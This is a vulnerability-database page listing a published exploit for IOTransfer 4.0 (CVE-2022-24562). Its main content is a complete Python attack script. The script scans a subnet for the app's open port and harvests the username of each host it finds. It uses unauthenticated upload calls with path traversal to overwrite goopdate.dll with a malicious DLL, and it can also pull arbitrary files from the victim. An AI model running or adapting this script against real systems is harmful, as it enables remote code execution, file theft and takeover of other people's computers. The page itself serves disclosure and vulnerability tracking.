Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

IOTransfer 4.0 Remote Code Execution

🗓️ 21 Jul 2022 00:00:00Reported by Tomer PeledType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 435 Views

IOTransfer 4.0 Remote Code Execution (RCE) on Windows 1

Related
Code
ReporterTitlePublishedViews
Family
0day.today		IOTransfer 4.0 - Remote Code Execution Exploit
21 Jul 202200:00
zdt
ATTACKERKB		CVE-2022-24562
16 Jun 202219:15
attackerkb
CNNVD		IOBit IOTransfer 访问控制错误漏洞
16 Jun 202200:00
cnnvd
Check Point Advisories		IOBit IOTransfer Arbitrary File Write (CVE-2022-24562)
2 Aug 202200:00
checkpoint_advisories
CVE		CVE-2022-24562
16 Jun 202218:31
cve
Cvelist		CVE-2022-24562
16 Jun 202218:31
cvelist
NVD		CVE-2022-24562
16 Jun 202219:15
nvd
OSV		CVE-2022-24562
16 Jun 202219:15
osv
Prion		Remote code execution
16 Jun 202219:15
prion
Positive Technologies		PT-2022-16718 · Iobit · Iobit Iotransfer
16 Jun 202200:00
ptsecurity
Rows per page
`# Exploit Title: IOTransfer V4 – Remote Code Execution (RCE)  
# Date: 06/22/2022  
# Exploit Author: Tomer Peled  
# Vendor Homepage: https://www.iobit.com  
# Software Link: https://iotransfer.itopvpn.com/  
# Version: V4 and onward  
# Tested on: Windows 10  
# CVE : 2022-24562  
# References: https://github.com/tomerpeled92/CVE/tree/main/CVE-2022%E2%80%9324562  
  
import os  
from urllib3.exceptions import ConnectTimeoutError  
from win32com.client import *  
import requests  
import json  
  
localPayloadPath = r"c:\temp\malicious.dll"  
remotePayloadPath="../Program Files (x86)/Google/Update/goopdate.dll"  
remoteDownloadPath = r'C:\Users\User\Desktop\obligationservlet.pdf'  
Range = "192.168.89"  
UpOrDown="Upload"  
IP = ""  
UserName = ""  
  
def get_version_number(file_path):  
information_parser = Dispatch("Scripting.FileSystemObject")  
version = information_parser.GetFileVersion(file_path)  
return version  
  
  
def getTaskList(IP, taskid=""):  
print("Getting task list...")  
url = f'http://{IP}:7193/index.php?action=gettasklist&userid=*'  
res = requests.get(url)  
tasks = json.loads(res.content)  
tasks = json.loads(tasks['content'])  
for task in tasks['tasks']:  
if taskid == task['taskid']:  
print(f"Task ID found: {taskid}")  
  
  
def CreateUploadTask(IP):  
SetSavePath(IP)  
url = f'http://{IP}:7193/index.php?action=createtask'  
task = {  
'method': 'get',  
'version': '1',  
'userid': '*',  
'taskstate': '0',  
}  
res = requests.post(url, json=task)  
task = json.loads(res.content)  
task = json.loads(task['content'])  
taskid = task['taskid']  
print(f"[*] TaskID: {taskid}")  
return taskid  
  
  
def CreateUploadDetailNode(IP, taskid, remotePath, size='100'):  
url = f'http://{IP}:7193/index.php?action=settaskdetailbyindex&userid=*&taskid={taskid}&index=0'  
file_info = {  
'size': size,  
'savefilename': remotePath,  
'name': remotePath,  
'fullpath': r'c:\windows\system32\calc.exe',  
'md5': 'md5md5md5md5md5',  
'filetype': '3',  
}  
res = requests.post(url, json=file_info)  
js = json.loads(res.content)  
print(f"[V] Create Detail returned: {js['code']}")  
  
  
def readFile(Path):  
file = open(Path, "rb")  
byte = file.read(1)  
next = "Start"  
while next != b'':  
byte = byte + file.read(1023)  
next = file.read(1)  
if next != b'':  
byte = byte + next  
file.close()  
return byte  
  
  
def CallUpload(IP, taskid, localPayloadPath):  
url = f'http://{IP}:7193/index.php?action=newuploadfile&userid=*&taskid={taskid}&index=0'  
send_data = readFile(localPayloadPath)  
try:  
res = requests.post(url, data=send_data)  
js = json.loads(res.content)  
if js['code'] == 200:  
print("[V] Success payload uploaded!")  
else:  
print(f"CreateRemoteFile: {res.content}")  
except:  
print("[*] Reusing the task...")  
res = requests.post(url, data=send_data)  
js = json.loads(res.content)  
if js['code'] == 200 or "false" in js['error']:  
print("[V] Success payload uploaded!")  
else:  
print(f"[X] CreateRemoteFile Failed: {res.content}")  
  
  
def SetSavePath(IP):  
url = f'http://{IP}:7193/index.php?action=setiotconfig'  
config = {  
'tasksavepath': 'C:\\Program '  
}  
requests.post(url, json=config)  
  
def ExploitUpload(IP,payloadPath,rPath,taskid =None):  
if not taskid:  
taskid = CreateUploadTask(IP)  
size = os.path.getsize(payloadPath)  
CreateUploadDetailNode(IP, taskid, remotePath=rPath, size=str(size))  
CallUpload(IP, taskid, payloadPath)  
  
  
def CreateDownloadTask(IP, Path) -> str:  
url = f'http://{IP}:7193/index.php?action=createtask'  
task = {  
'method': 'get',  
'version': '1',  
'userid': '*',  
'taskstate': '0',  
'filepath': Path  
}  
res = requests.post(url, json=task)  
task = json.loads(res.content)  
task = json.loads(task['content'])  
taskid = task['taskid']  
print(f"TaskID: {taskid}")  
return taskid  
  
  
def ExploitDownload(IP, DownloadPath, ID=None):  
if ID:  
url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={ID}'  
else:  
taskid = CreateDownloadTask(IP, DownloadPath)  
url = f'http://{IP}:7193/index.php?action=downloadfile&userid=*&taskid={taskid}'  
res = requests.get(url)  
return res  
  
def ScanIP(startRange):  
print("[*] Searching for vulnerable IPs", end='')  
Current = 142  
IP = f"{startRange}.{Current}"  
VulnerableIP: str = ""  
UserName: str = ""  
while Current < 252:  
print(".", end='')  
url = f'http://{IP}:7193/index.php?action=getpcname&userid=*'  
try:  
res = requests.get(url, timeout=1)  
js = json.loads(res.content)  
js2 = json.loads(js['content'])  
UserName = js2['name']  
VulnerableIP=IP  
print(f"\n[V] Found a Vulnerable IP: {VulnerableIP}")  
print(f"[!] Vulnerable PC username: {UserName}")  
return VulnerableIP,UserName  
except Exception as e:  
pass  
except ConnectTimeoutError:  
pass  
IP = f"{startRange}.{Current}"  
Current = Current + 1  
return None,None  
  
  
if __name__ == '__main__':  
IP,UserName = ScanIP(Range)  
if IP is None or UserName is None:  
print("[X] No vulnerable IP found")  
exit()  
print("[*] Starting Exploit...")  
if UpOrDown == "Upload":  
print(f"[*]Local Payload Path: {localPayloadPath}")  
print(f"[*]Remote Upload Path: {remotePayloadPath}")  
ExploitUpload(IP,localPayloadPath,remotePayloadPath)  
elif UpOrDown == "Download":  
print(f"[*] Downloading the file: {remoteDownloadPath}")  
res = ExploitDownload(IP, remoteDownloadPath)  
file = open("out.pdf", "wb+")  
file.write(res.content)  
file.close()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Jul 2022 00:00Current
0.2Low risk
Vulners AI Score0.2
CVSS 3.19.8
CVSS 210
EPSS0.49159
exploitremote code executioniotransferwindows 10cve-2022-24562vendorversiontestedreferenceshttpfile uploadfile download
435